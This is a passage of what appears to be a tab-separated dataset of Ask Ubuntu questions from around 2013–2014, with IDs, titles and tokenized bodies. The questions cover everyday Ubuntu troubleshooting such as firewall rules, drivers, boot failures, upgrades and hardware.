not installed ] 31 ) libdrm-radeon1 : i386 [ not installed ] 32 ) libdrm2 : i386 [ not installed ] 33 ) libgl1-mesa-dri : i386 [ not installed ] 34 ) libgl1-mesa-glx : i386 [ not installed ] 35 ) libglapi-mesa : i386 [ not installed ] 36 ) libx11-6 : i386 [ not installed ] 37 ) libxcb-dri2-0 : i386 [ not installed ] 38 ) libxcb-glx0 : i386 [ not installed ] 39 ) libxcb1 : i386 [ not installed ] 40 ) libxdamage1 : i386 [ not installed ] 41 ) libxext6 : i386 [ not installed ] 42 ) libxfixes3 : i386 [ not installed ] 43 ) libxxf86vm1 : i386 [ not installed ] leave the following dependencies unresolved : 44 ) gnome-bluetooth recommends gnome-control-center 45 ) indicator-power recommends gnome-control-center ( > = 3.1 ) | ubuntu-system-settings 46 ) indicator-sound recommends gnome-control-center | ubuntu-system-settings 47 ) libaccount-plugin-1.0-0 recommends gnome-control-center-signon 48 ) unity recommends gnome-control-center-unity 49 ) unity recommends indicator-bluetooth 50 ) xserver-xorg recommends libgl1-mesa-dri 51 ) ubuntu-restricted-addons recommends gstreamer1.0-plugins-bad 52 ) gnome-control-center-data recommends gnome-control-center ( > = 1:3.6.3-0ubuntu45.2 ) 53 ) indicator-datetime recommends gnome-control-center-datetime | ubuntu-system-settings 54 ) xserver-xorg-core recommends libgl1-mesa-dri ( > = 7.10.2-4 ) 55 ) libgl1-mesa-glx recommends libgl1-mesa-dri ( > = 7.2 ) 56 ) xserver-xorg-video-nouveau recommends libgl1-mesa-dri ( > = 7.11.1 ) 57 ) libegl1-mesa recommends libegl1-mesa-drivers accept this solution ? [ y/n/q/ ? ] edit those are my additionally installed ppas : ./danielrichter2007-grub-customizer-saucy.list ./danielrichter2007-grub-customizer-saucy.list.save ./dropbox.list ./dropbox.list.save ./google-chrome.list ./google-chrome.list.save ./linrunner-tlp-saucy.list ./linrunner-tlp-saucy.list.save ./me-davidsansome-clementine-saucy.list ./me-davidsansome-clementine-saucy.list.save ./steam.list ./steam.list.save ./webupd8team-java-saucy.list ./webupd8team-java-saucy.list.save
402068	i added new ram modules to my system , now i get unexpected shutdowns , why ?	some days ago i increased my laptop 's memory to 16gb , now i 'm facing unexpected shutdown , how i can check the reason my laptop is holding ubuntu 13.10 linux inspiron-3521 3.11.0-15-generic # 23-ubuntu smp mon dec 9 18:17:04 utc 2013 x86_64 x86_64 x86_64 gnu/linux
402070	i get an error : could not write bytes : broken pipe	every time i input my password in the login window and press the enter key , i get an error message : could not write bytes : broken pipe and then quickly return to the login window . but i can log in as guest . i only remember that i have tried to install the ati display card driver before this situation occurs . i have tried : sudo dparted to remove the ubuntu partition and reinstall ubuntu , but i get same error . i 'm working on ubuntu 12.04.3 lts . thanks .
402073	why is ufw ignoring rule order ?	i have two interfaces , one is eth0 and the other is a vpn over tun0 . user @ server : ~ $ ifconfig eth0 inet addr:192.168.1.80 bcast:192.168.1.255 mask:255.255.255.0 tun0 inet addr:10.4.0.100 p-t-p:10.4.0.100 mask:255.255.255.255 i 've set up ufw rules to the following : user @ server : ~ $ sudo ufw status numbered status : active to action from -- -- -- -- -- -- [ 1 ] anywhere on eth0 allow in 192.168.1.0/24 [ 2 ] 192.168.1.0/24 allow out anywhere on eth0 ( out ) [ 3 ] 239.0.0.0/8 allow out anywhere on eth0 ( out ) [ 4 ] 216.17.8.0/24 allow out anywhere on eth0 ( out ) [ 5 ] anywhere allow out anywhere on tun0 ( out ) however the connection being established is happening through the tun0 interface . user @ server : ~ $ sudo netstat -n -a inet active internet connections ( w/o servers ) proto recv-q send-q local address foreign address state tcp 0 101592 10.4.0.100:48593 216.17.8.132:443 established so i inserted a new rule to see if i could force the connection away from tun0 . user @ server : ~ $ sudo ufw status numbered status : active to action from -- -- -- -- -- -- [ 1 ] anywhere on eth0 allow in 192.168.1.0/24 [ 2 ] 192.168.1.0/24 allow out anywhere on eth0 ( out ) [ 3 ] 239.0.0.0/8 allow out anywhere on eth0 ( out ) [ 5 ] 216.17.8.0/24 allow out anywhere on eth0 ( out ) [ 6 ] 216.17.8.0/24 deny out anywhere on tun0 ( out ) [ 7 ] anywhere allow out anywhere on tun0 ( out ) but again , the connection is being made over tun0 . i 'm very confused since i thought ufw applied the rules in sequence . is that assumption incorrect ? how do i achieve it so that no other traffic exits eth0 except local traffic and packets to 216.17.8.0/24 ? and that packets to 216.17.8.0/24 never go through tun0 ?
402074	d drive missing	i have installed ubuntu 13.10 , alongside by windows 7 installation on my c : drive . however , now when i boot into windows 7 , my d : drive is missing . how can i get my d : drive to reappear in windows 7 ? when i boot into ubuntu , all drives are visible .
402082	do n't have permission on file copied another account	i copied some of the folders from another account to the administrator account using gksu . now , i am not able cut or delete that file and also not able to set permission . help .
402083	enable/disable ubuntu desktop environment on ubuntu-12.04.1-server-i386	i have installed ubuntu-12.04.1-server-i386 and on top of that i have installed ubuntu desktop environment so that i can maintain server easily . hear i totally understand that installing desktop environment will affect my server efficiency but its quit easy to maintain server with gui so i am wondering that is there any workaround to enable or disable ubuntu desktop environment whenever we need it like we do in windows for services ? i searched and reffed many sites but did not found anything related to this . thanks in advance and sorry for my poor english .
402085	xubuntu crashes before login screen	xubuntu 13.10 booted up this morning and xubuntu does not get to the login screen . i am seeing the white half circle spinning and then it drops to a black screen . i can however start tty1-6 but that does n't help me much because this has never happened before , hence i do n't know what to do at the moment . as far as i know , i did not perform any changes to xfwm4 , lightdm by text ( in config files ) . installed a numix theme via ppa and played around with some settings for the xscreensaver but all that happened via gui and some simple terminal commands ( adding a ppa ) . that is about it i 'd say . some notes : an update via apt-get update & & apt-get dist-upgrade did not help . going forth and back between tty1 and tty7 did not help . graphics : intel hd something . so no nvidia or amd card . does anyone have any pointer what i could do to solve the problem ? it would be greatly appreciated . : ) any info i could provide via | pastebinit ? edit what do you know . there is something broken with x or lightdm . so i logged in via tty1 and then just typed startx and hit enter . i 'm in xubuntu now and as you can see , it 's working , however all fonts looks really odd . somehow the anti-aliasing settings in the appearance options for xfce were reset . hm , what is going on ?
402086	how to use an environment variable of a remote host using scp ?	i have two machine , host1 and host2 . i would like to use an environment variable of host2 , from a scp command from host1 . for instance , use this kind of command from host1 : scp file host2 @ host2_adress : $ foo where $ foo is defined in host2 as the path of a directory . if i am using the command above , bash will search among the variables of host1 and not host2 . a practical example would be to use the $ home variable of host2 how to do it ?
402090	touchpad does n't tap-click at login screen	on every desktop environment , except for the login screen of ubuntu 12.04 , i can just tap the touchpad of my laptop to simulate a mouseclick . why does n't it work anymore at the login screen ?
402098	recording a screencast in xmonad	i have been trying to record a screencast under xmonad , the problem is that it seems that both vokoscreen and record my desktop go a bit haywire when i try to tell them to record one window under xmonad . does anyone have any advice on how to get this to work ?
402101	simulate ac power plug/unplug	can someone tell me how can i simulate ac power plug/unplug in ubuntu 13.10 ? i would like to create a script , that do something when ac power is plugged/unplugged , but is really annoying to plug/unplug power cable every minute : )
402105	upgrade from 12.10 to 13.x - says `` no new release found ''	i 'd like to upgrade from 12.10 to 13.10 , even if that means upgrading to 13.04 first dell @ dell : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal dell @ dell : ~ $ sudo do-release-upgrade [ sudo ] password for dell : checking for a new ubuntu release no new release found dell @ dell : ~ $ i followed instructions from http : //linuxg.net/yet-another-way-to-upgrade-update-from-ubuntu-12-10-to-ubuntu-13-04/ , and upgrade ubuntu 12.04 to 13 , and http : //linuxg.net/update-from-ubuntu-12-10-to-ubuntu-13-04-by-terminal/ , and why is `` no new release '' found after i 'm told its available ? , and similar googles . they all tell pretty much the same thing , which i have tried . software updater continues to say `` the software on this computer is up to date '' . i have never been notified that 13.x is available .
402107	so when will ubuntu touch come out on samsung galaxy ?	just wondering because i 've ubuntu on my desktop works effortlessly and wan na make the switch but also wondering if play store is compatible with operating system or perhaps built in ?
402110	ubuntu resize partition after installing	as i have been trying to resize my partition of hardisk.i have total volume of 500gb as master.i am not sure in this and i need you'r suggestion how to achieve it . note : and i do n't want to lose anything too .
402116	how to allow local logins , after misconfiguring pam in ad integration process	aim : create an r server that integrates into our windows environment by setting up ad integration on an ubuntu box using : ubuntu 12.04 lts following : https : //help.ubuntu.com/community/activedirectorywinbindhowto problem : an ubuntu server was provisioned for me , and i was given a login ruser . i 've been following the ad integration walkthrough and then applied this section of the how-to file : /etc/pam.d/common-auth auth sufficient pam_winbind.so auth sufficient pam_unix.so nullok_secure use_first_pass auth required pam_deny.so on a ubuntu 7.10 ( gutsy gibbon ) and 9.04 ( jaunty jackalope ) systems , these changes to pam.d/common-auth result in not being able to log in as a local user , for example by ssh . your luck may be better , but test immediately just in case . and then scrolled down to find out that this prevents logins from local accounts , around the same time my putty session shut down and attempting to login again now results in the session being shut down . i can use an ad login to get in but can not amend the common-auth file with my ad login as i 'm not in the sudoers group . requirement : if root is disabled is there another way i can change the file now that i 've locked myself out ?
402119	ubuntu 13.04 on macbook pro retina boots to black screen after apt-get upgrade	i installed ubuntu 13.04 into a partition on the hard drive on my macbook pro 15 '' with retina display . i used this tutorial to install it . i then ran apt-get update and upgrade . after that i purged the nvidia packages and installed nvidia-current because i had problems with virtual versions of 13.04 and i thought it might help . now when i boot up my ubuntu partition it displays some white text before going to a black screen . holding shift or pressing alt-ctrl-f1 does nothing . is there any way to get into it to fix it ? if not when i reinstall it how should i do it so this does n't happen again ? if you do n't know is there a way i can save the state of my os before i run upgrade so i do n't have to keep reinstalling it every time i try something ? thank you .
402128	how can i change my rwin ?	recently i did a tcp test.i was told my rwin value was very low and that i should increase it . how do i do that ? these are my results : « speedguide.net tcp analyzer results » tested on : 2014.01.08 05:41 ip address : 24.235.xxx.xx client os/browser : linux ( chrome 31.0.1650.63 ) tcp options string : 020405b40402080a0010ab980000000001030307 mss : 1460 mtu : 1500 tcp window : 14720 ( not multiple of mss ) rwin scaling : 7 bits ( 2^7=128 ) unscaled rwin : 115 recommended rwins : 64240 , 128480 , 256960 , 513920 , 1027840 bdp limit ( 200ms ) : 589kbps ( 74kbytes/s ) bdp limit ( 500ms ) : 236kbps ( 29kbytes/s ) mtu discovery : on ttl : 49 timestamps : on sacks : on ip tos : 00000000 ( 0 )
402137	wireless not connected in ubuntu 12.04	i have purchased a new dell inspiron 15 3521 laptop . initially both wired lan as well wireless in not working . after configuring the manual ip address for lan , wired network is working . wireless is also working for some time after upgrade and restart network-manager . suddenly it is not working . output of various commands are as follows . can someone help me on this . thanks in advance for your support . lshw -c network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 05 serial : 74:86:7a:42 : f0 : ac size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.1.20 latency=0 multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory : c0404000-c0404fff memory : c0400000-c0403fff *-network description : wireless interface product : qca9565 / ar9565 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 3c:77 : e6 : a0:4c:85 width : 64 bits clock : 33mhz capabilities : bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-58-generic firmware=n/a ip=192.168.1.13 latency=0 multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : c0500000-c057ffff memory : afb00000-afb0ffff warning : output may be incomplete or inaccurate , you should run this program as super-user . uname -a 88-ubuntu smp tue dec 3 17:37:58 utc 2013 x86_64 x86_64 x86_64 gnu/linux lspci | grep -i wireless 02:00.0 network controller : qualcomm atheros qca9565 / ar9565 wireless network adapter ( rev 01 ) rfkill list all 1 : dell-wifi : wireless lan soft blocked : no hard blocked : no 2 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no 4 : hci0 : bluetooth soft blocked : no hard blocked : no
402140	move windows to workspaces defined in place windows compiz plugin	when i plug in external monitor and switch off default one , all started programs are set to workspace 1 event if they were assigned to another workspace . it 's really annoying to move them manually every time if i have already defined where they should be ( place windows plugin ) . i wonder if there is a simple way to force placing windows according to settings . i mean something that i could run with a keystroke once workspaces get mixed . i know there 're tools like wmctrl but i would rather use already defined settings in ccsm if possible . i tried these commands which ends up with all windows in workspace 1 : compiz -- replace unity -- replace
402142	how do i correctly connect multiple monitors using display port and nvidia geforce gt 730m/intel hd 4600 hybrid graphics card	i recently bought a new lenovo thinkpad t440p . this laptop comes with a nvidia geforce gt 730m/intel hd 4600 hybrid graphics card . i am now trying to connect the laptop with the lenovo thinkpad ultra dock to two monitors via displayport - but with no success so far . if the laptop is connected to the docking station during the booting process , the login screen never appears . all monitors stay black but the integrated monitor is backlit . as soon i disconnect the laptop from the docking station , xorg continues to load and the login screen appears . if i connect the laptop to the docking station after logging in , the integrated display still works . but as soon as i try to activate one of the external displays in xfce4 display settings the screen freezes . after disconnecting the laptop from the docking station it works again . both situations can be reproduced with or without proprietary nvidia drivers ( 319 and 331 ) . here is the kernel output with additional drm debug information : http : //pastebin.com/fmv9kj67 here is the output of xorg : http : //pastebin.com/w3u9t8pt i also tried newer kernel versions ( 3.12 and 3.13 ) which did n't help either . nvidia-settings and nvidia-xconfig do not recognize the external monitors when connected to the docking station . i have heard that in some thinkpad models the displayports are wired to the intel gpu directly . does somebody have any information about this ? does it even matter ?
402145	frozen gui after google-chrome maximize	from time to time happens to me , when i move google-chrome window to the top of the screen to maximize it , suddenly the gui freezes with the window showing as maximizing with orange borders and shade . mouse also does n't work . i 'm using ubuntu 13.10 . is there some way to avoid this behavior or to get back to working gui with all opened programs ? i have tried going to ctrl+alt+f1 and killing google-chrome which brings me back to login screen .
402147	how to stop ubuntu trying to start a particular device while resuming from suspend ?	i am getting an error when resuming from suspend . i am using ubuntu 12.04.3 on an acer aspire s3 ultrabook . the error is : dpm_run_callback ( ) : pnp_bus_resume+0x0/0x80 returns -19 pm : device 00:07 failed to resume : error -19 i have looked for the device 00:07 using lspci , but device 00:07 is not listed there . does anyone know how i can find out what the device is or how i can stop ubuntu trying to start it when resuming from suspend ?
402149	how to get the boot time of ubuntu ?	i am trying to find the boot time of ubuntu . the following tells me that my last reboot took 1 minutes 39 second . $ last reboot reboot system boot 3.8.0-29-generic wed jan 8 14:55 - 16:35 ( 01:39 ) reboot system boot 3.8.0-29-generic wed jan 8 14:38 - 14:55 ( 00:16 ) reboot system boot 3.8.0-29-generic wed jan 8 14:27 - 14:38 ( 00:10 ) reboot system boot 3.8.0-29-generic wed jan 8 11:07 - 14:27 ( 03:19 ) reboot system boot 3.8.0-29-generic wed jan 8 00:03 - 00:31 ( 00:27 ) reboot system boot 3.8.0-29-generic tue jan 7 10:39 - 14:22 ( 03:43 ) reboot system boot 3.8.0-29-generic mon jan 6 10:51 - 18:42 ( 07:50 ) reboot system boot 3.8.0-29-generic sun jan 5 22:08 - 00:19 ( 02:11 ) reboot system boot 3.8.0-29-generic sat jan 4 11:34 - 15:47 ( 04:12 ) while when i looked at dmesg : [ 14.707210 ] type=1400 audit ( 1389173157.301:11 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=1018 comm= '' apparmor_parser '' this shows that the total boot time is 14.707210 . so as per the above two methods which is the actual boot time ?
402156	what will happen if i remove this line from /etc/hosts	i am trying to configure hadoop and have problems configuring it . one doubt i have about network config and it 's related to host info . in /etc/hosts second line is like 127.0.1.1 slave1-machine and i know it is related to machine name . but the thing i do not know , is that what is the purpose for this line and if i remove it from the file , what will happen ?
402160	mysql/php connection	i 'm a newbie to ubuntu , and im trying to connect the mysqlworkbench ( database ) with php5.3 if ( function_exists ( 'mysql_connect ' ) ) { echo `` good < br / > \n '' ; } else { echo `` bad. < br / > \n '' ; } i 'm getting the output as bad and then i tried with mysqli_connect , that is also not exists in my scenario . is there any way to solve this issue ? thanks in advance.. show some examples to tackle this
402166	archive manager -how to or help file	i have been operating linux exclusively for about 8 years ( ubuntu 4 years ) . i 'm still a newbie and basically use linux like windows ( i dont know much ) is there a help , or how to site i can go to , to help me learn how to use archive manager ?
402169	login screen looping after installing cuda toolkit on ubuntu 12.04 lts	i have installed ubuntu 12.04 lts - 32 bit version on my system . i did sudo apt-get update & & sudo apt-get upgrade . i installed the following packages - vim-gnome , python-matplotlib , python-scipy , acroread , and git . i have a gpu on my machine : nvidia geforce gt 520 . i wanted to install the cuda toolkit on this machine . for this , i have followed the instructions given in the webpage https : //www.udacity.com/wiki/cs344/ubuntu_dev i did what has been told there with few changes : in the step sudo apt-get install build-essential libopencv-dev linux-headers-uname -r ( i dind't put uname -r in the appropriate quotes to maintain consistency ) , i have skipped the installation of libopencv-dev because i wanted to install opencv separately . i have downloaded the 32-bit version of cuda toolkit from https : //developer.nvidia.com/cuda-downloads . i have stopped the lightdm service in the beginning of the installation using the command sudo service lightdm stop . the entire installation was done using the command prompt ( ctrl-alt-f1 ) . after this , when i tried to login from my account , i am unable to login . though i am entering the correct password , it is returning me to the login screen . i have tried to do the following : used the command sudo chown < myusername > : < myyusername > .xauthority from the command prompt . but , it showed an error that could not update ice authority file /home/user/.iceauthority so , i followed the procedure on can not login after update ubuntu 12.04 . iceauthority error message . it still did n't work . i tried to remove the file /etc/modprobe.d/blacklist-nouveau.conf which was made during the installation as given above . i then updated : sudo update-initramfs -u waiting for an answer .
402178	sendmail & mysql	i had mysql and php working good in the nginx server . for mailing purpose i installed sendmail . now all i get is your php installation appears to be missing the mysql extension which is required by wordpress . in my wordpress site here now no idea how to make it work again . i 've restarted mysql , nginx but nothing helped so far . can someone enlighten me please .
402180	how to enable global menu for phpstorm in 13.10	i 've installed phpstorm in /opt/phpstorm and after first run there is file ~./local/share/applications/jetbrains-phpstorm.desktop [ desktop entry ] version=1.0 type=application name=phpstorm icon=/opt/phpstorm/bin/webide.png exec= '' /opt/phpstorm/bin/phpstorm.sh '' % f comment=develop with pleasure ! categories=development ; ide ; terminal=false startupwmclass=jetbrains-phpstorm i 've tried with exec=env ubuntu_menuproxy=1 /opt/phpstorm/bin/phpstorm.sh but that does n't work . so , my question is how to move menu bar ( file , edit , etc ) from phpstorm window to the top bar as seen in other applications in order to get more working space and better system integration ? i think this is also issue with other jetbrains products like webstorm , idea , etc .
402181	how to install dual boot ubuntu and win8 on asus f202e-ct148h ?	i purchased asus f202e-ct148h vivobook with no optical drive and it has 4 factory installed partitions with win 8 preloaded . i want to install ubuntu 13.04 on it but i am not able to do so as it ts coming with pre-installed windows 8 and uefi , secure boot . i tried all possible way mentioned on youtube and ubuntu forum . with usb also its not booting after disabling secure boot , fast boot . so any one installed dual boot win8 & ubuntu on asus f202e-ct148h , plz help . ?
402185	named.conf or named.conf.local	first time installing bind , the server will be a primary server with several zones which another server hosted elsewhere will slaves from . we are currently running solaris bind and it uses the named.conf file but ubuntu docs say to use named.conf.local for primary servers . is this correct and if possible can someone explain the difference in the two files ? many thanks
402188	remove swap to create another backup partition	i need windows : ( , i use dual boot . i have a space that is not used in hd for having execido on [ humerus of the win8 discs . can i delete my swap partition to transform it into a discp backup ? i have 8 gb of memory , my swap partition is 16 gb .
402194	no wakeup after screenlock	after 10 minutes my desktop computer darkens the screen , and when i move the mouse or tab any key it comes back alive and asks for my password . that is perfect and the behavior i like to have it . but sometimes ( mostly after a longer period ) i ca n't get back to the login screen . nothing happens when moving mouse or press a key . only way to get the computer back working is by restarting with reset button on the machine . has anyone an idea what i need to do ? i have a amd hd 7950 grapics card with the 13.12 driver . ubuntu is 13.10 with unity . here is a link to a blogger with the same problem : ubuntu suspend wo n't wake up : my quest - wafflesatnoon.com
402198	server not found problem	i 've encountered an problem , maybe trivial - when i try to load this page : http : //home.thep.lu.se/~torbjorn/pythia.html i recive classic 'server not found ' page . i 'm using mozilla firefox on ubuntu 12.04 . other pages ( google.com , askubuntu.com etc . ) work fine . page that doesnt load on my laptop , works perfectly on other computers connected through same router . i 've tried to connect via 3 different routers . tried `` sudo iptables -f '' and `` sudo ufw disable '' commands . also tried chromium browser . what may cause the problem ?
402200	usb internet ( airtel - huawei e392 ) dongle not detected after upgrade to 12.10	i upgraded the ubuntu on my laptop from 12.04 - > 12.10 . in 12.04 , i followed the installation procedure for linux . whenever i connect the usb dongle , the application launches on detection and i can connect using the gui window . i upgraded to ubuntu 12.10 , when i am connecting the dongle . the device is not detected . after this i tried the usb_modeswitch method , adding the rule in the /lib/udev/rules/40-usb_modeswitch** with the vendor and devid . i can see in the `` dmesg '' the modem detection as : [ 2111.508851 ] usb 2-1.4 : new high-speed usb device number 16 using ehci_hcd [ 2111.609813 ] usb 2-1.4 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 2111.610163 ] usb 2-1.4 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 2111.610476 ] usb 2-1.4 : gsm modem ( 1-port ) converter now attached to ttyusb2 i created a connection in the network_configuration and re-connected the usb dongle , but still connection is not activating in the network manager .
402202	external hdd not automounting at startup with udisksctl	ubuntu 13.10 here . i have two external hdds that are ( almost ) always plugged in . i want them to automout at startup , so i added two startup entries : udisksctl mount -- block-device /dev/disk/by-uuid/disk1_uuid_here and same for hdd2 . now they almost always mount , almost . when they dont , running any udisksctl command will mount them . for example , even running only udisksctl dump mounts the two drives correctly . do you have any idea about why sometimes they do n't automount properly at startup ? thanks a lot
402204	can not boot onto windows hdd	i have just installed ubuntu 12.04 onto a new hard drive , with windows xp on a separate hard drive . i physically set the ubuntu drive as primary and it shows as sda . the boot loader is on this drive too . i left the windows drive completely alone . on boot , windows xp proffessional is listed as one of the options , but when i choose this an error is shown . error : no such device f47836067835c85e error : hd1 can not get c/h/s values i am able to boot into ubuntu . i have disconnected the ubuntu hdd and reconnected it to the primary position on the motherboard so that i can re-access windows ! please can anyone help ? i gave up on linux 8 years ago , and whilst it seems easier in some ways , there are still huge complications ! many thanks in advance .
402210	problem with libre office in ubuntu 13.04 ?	i dont have a printer , and i use ubuntu 13.04 . the problem is , i write in libre office writer . whenever i take those files for a print out in a computer cafe , they use ms office 2010 and all my documents format kind of changes and tends to move over one another . i 've downloaded wine and tried to install ms office 2010 on my pc . on executing the setup via wine a setup wizard shows up but suddenly at the end of the installation , the wizard vanishes . i 've searched but there is no ms office installed . i need a kind of help overhere , please . thanks !
402211	how to recover deleted usr/share/gnome-shell/theme/gnome-shell.css file in gnome 3.4 ?	i deleted usr/share/gnome-shell/theme/gnome-shell.css is there a way i can recover this file , i am not looking for recovery programs , just maybe a command that will regenerate it .
402222	turning off bluetooth also turns off wi-fi on hp pavilion dm4-1150ea	just upgraded from 10.04 to 12.04 on a dual boot hp pavilion dm4-1150ea . if i disable bluetooth then wi-fi is also disabled . i have looked at these similar reported issues : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/962621 http : //ubuntuforums.org/showthread.php ? t=1947495 & page=2 i have also logged in using classic gnome , but this did n't work . any suggestions about a fix for this ? note that all was working on 10.04 . **update*** a bit more info : eamon @ eamon-laptop : /media $ sudo rfkill list [ sudo ] password for eamon : 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no 4 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 13 : hci0 : bluetooth soft blocked : no hard blocked : no try to turn off bluetooth in software ... ... eamon @ eamon-laptop : /media $ sudo rfkill block 1 eamon @ eamon-laptop : /media $ sudo rfkill list 0 : hp-wifi : wireless lan soft blocked : yes hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no 4 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no both the bluetooth and wifi are turned off . try to unblock wifi ... eamon @ eamon-laptop : /media $ sudo rfkill unblock 0 eamon @ eamon-laptop : /media $ sudo rfkill list 0 : hp-wifi : wireless lan soft blocked : yes hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no 4 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no that did n't work . turn off wifi using the hardware switch ... eamon @ eamon-laptop : /media $ sudo rfkill list 0 : hp-wifi : wireless lan soft blocked : yes hard blocked : yes 1 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : yes 3 : phy0 : wireless lan soft blocked : no hard blocked : no 4 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no turn on wifi using the hardware switch ... eamon @ eamon-laptop : /media $ sudo rfkill list 0 : hp-wifi : wireless lan soft blocked : yes hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no 4 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no
402225	which version of ubuntu will work on my powerpc ?	i 'm using imac powerpc g5 1.8 ghz , 1gb ram , 160gb hdd , and 10.5.4 leopard os . i want to run ubuntu on my imac . please can anyone tell me which version will run in my system ?
402236	i can n't copy any file to my pendrive	actually i can n't copy any files from my ubuntu ( 13.10 ) to pendrive ( jetflash transcend 8gb ) when i try to copy a simple file then it say 's - *error while copying to `` transcend '' . *the destination is read only n.b : i tryed both ntfs and fat file system . as i am new to ubuntu so tell me all thing in details*urgently needed* give me a quick solution to fix this problem
402237	ps3 controller only works after unplugging and plugging in again	i use xboxdrv for my ps3 controllers which i connect via usb . i start xboxdrv with the following command ( using daemon because i do n't have the controllers connected all the time ) : sudo /usr/bin/xboxdrv -- daemon -- detach-kernel-driver -- mimic-xpad -- next-controller -- mimic-xpad when i plug in the controller # 1 the first time after a reboot i get the following log messages from xboxdrv : [ info ] udevsubsystem : :on_udev_data ( ) : trying to read data from udev [ info ] udevsubsystem : :on_udev_data ( ) : trying to read data from udev monitor [ info ] udevsubsystem : :on_udev_data ( ) : got data from udev monitor [ debug ] udevsubsystem : :print_info ( ) : / -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - [ debug ] udevsubsystem : :print_info ( ) : devpath : /devices/pci0000:00/0000:00:1d.0/usb6/6-1 [ debug ] udevsubsystem : :print_info ( ) : action : add [ debug ] udevsubsystem : :print_info ( ) : subsystem : usb [ debug ] udevsubsystem : :print_info ( ) : devtype : usb_device [ debug ] udevsubsystem : :print_info ( ) : syspath : /sys/devices/pci0000:00/0000:00:1d.0/usb6/6-1 [ debug ] udevsubsystem : :print_info ( ) : sysname : 6-1 [ debug ] udevsubsystem : :print_info ( ) : sysnum : 1 [ debug ] udevsubsystem : :print_info ( ) : devnode : /dev/bus/usb/006/002 [ debug ] udevsubsystem : :print_info ( ) : driver : usb [ debug ] udevsubsystem : :print_info ( ) : action : add [ debug ] udevsubsystem : :print_info ( ) : \ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ info ] xboxdrvdaemon : :connect ( ) : connecting slot to thread [ info ] xboxdrvdaemon : :connect ( ) : controller connected : 006:002 054c:0268 'playstation ( r ) 3 controller' [ info ] xboxdrvdaemon : :connect ( ) : launched controller for 006:002 in slot 0 , free slots : 1/2 the controller is now connected to /dev/bus/usb/006/002 , but it does n't work . when i now unplug and reconnect the controller it gets connected to /dev/bus/usb/006/003 and now works perfectly : [ info ] udevsubsystem : :on_udev_data ( ) : trying to read data from udev [ info ] udevsubsystem : :on_udev_data ( ) : trying to read data from udev monitor [ info ] udevsubsystem : :on_udev_data ( ) : got data from udev monitor [ debug ] udevsubsystem : :print_info ( ) : / -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - [ debug ] udevsubsystem : :print_info ( ) : devpath : /devices/pci0000:00/0000:00:1d.0/usb6/6-1 [ debug ] udevsubsystem : :print_info ( ) : action : add [ debug ] udevsubsystem : :print_info ( ) : subsystem : usb [ debug ] udevsubsystem : :print_info ( ) : devtype : usb_device [ debug ] udevsubsystem : :print_info ( ) : syspath : /sys/devices/pci0000:00/0000:00:1d.0/usb6/6-1 [ debug ] udevsubsystem : :print_info ( ) : sysname : 6-1 [ debug ] udevsubsystem : :print_info ( ) : sysnum : 1 [ debug ] udevsubsystem : :print_info ( ) : devnode : /dev/bus/usb/006/003 [ debug ] udevsubsystem : :print_info ( ) : driver : usb [ debug ] udevsubsystem : :print_info ( ) : action : add [ debug ] udevsubsystem : :print_info ( ) : \ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ info ] xboxdrvdaemon : :connect ( ) : connecting slot to thread [ info ] xboxdrvdaemon : :connect ( ) : controller connected : 006:003 054c:0268 'playstation ( r ) 3 controller' [ info ] xboxdrvdaemon : :connect ( ) : launched controller for 006:003 in slot 0 , free slots : 1/2 after the first conroller is plugged in , the second can be plugged in and starts working directly . what 's also strange is that when i first connect any other device ( such as a mouse ) to the usb port and then disconnect that and plug in the first controller it also works without unplugging the controller . my current theory is that something is not working correctly for /dev/bus/usb/006/002 and as soon as the controller gets a different device number assigned it works . does anybody have an idea what i could do about that ? maybe there is a way to assign the controller directly to a different device number without having to plug something in and unplug it before i plug in the first controller ...
